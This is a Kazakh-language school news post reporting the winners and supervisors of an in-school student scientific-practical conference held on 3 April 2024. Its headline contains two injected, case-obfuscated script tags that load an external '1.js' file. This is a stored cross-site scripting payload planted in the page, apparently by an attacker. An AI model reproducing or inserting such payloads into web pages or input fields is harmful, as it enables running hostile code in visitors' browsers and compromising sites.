Ғылыми-практикалық конференция<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.04.2024

2024 жылдың 3 сәуірінде «Ақмола облысы білім басқармасының Атбасар ауданы бойынша білім бөлімі Борисовка ауылының жалпы орта білім беретін мектебі» коммуналдық мемлекеттік мекемесінде ғылыми-практикалық конференцияның мектепішілік кезеңі өтті. Ғылыми жұмыс байқауына 9 оқушы қатысты. Мектеп оқу ісінің меңгерушісі Буряк Галина Владимировна конференцияның ашылуын өткізді, қатысушыларға сәттілік тіледі, комиссия мүшелерін таныстырды.  2-4 сынып оқушылары қатысқан "Зерде" байқауына жеке және ұжымдық жұмыстар ұсынылды. Жоба байқауында бірінші орынды 3-сынып оқушылары Титенко М. және Буйневич С. (жетекшісі Глушко С.М.) тобы иеленді. екінші орынды 4-сынып оқушысы Гавва А.(жетекшісі Чумак М.В.), 3-орынды 2-сынып оқушысы Быкова Е.(жетекшісі Пономарева В.А.) жеке жұмысы иеленді.

7-11 сынып оқушыларының жобалары арасынан бірінші орынды 8-сынып оқушысы Миллер А. және 9-сынып оқушысы Эрнст Д. (жетекшісі В.И. Циммерман) физика пәнінен бірлескен ғылыми жобасы иеленді.

Ұсынылған жобалар өте қызықты және өзекті болды. Оқушыларға ғылыми-тәжірибелік конференцияның облыстық кезеңінде сәттілік тілейміз!

Оқу ісінің меңгерушісі: Буряк Г.В.

Просмотров: 3151


Пікір қосу



Деректерді қолтаңбаға қосу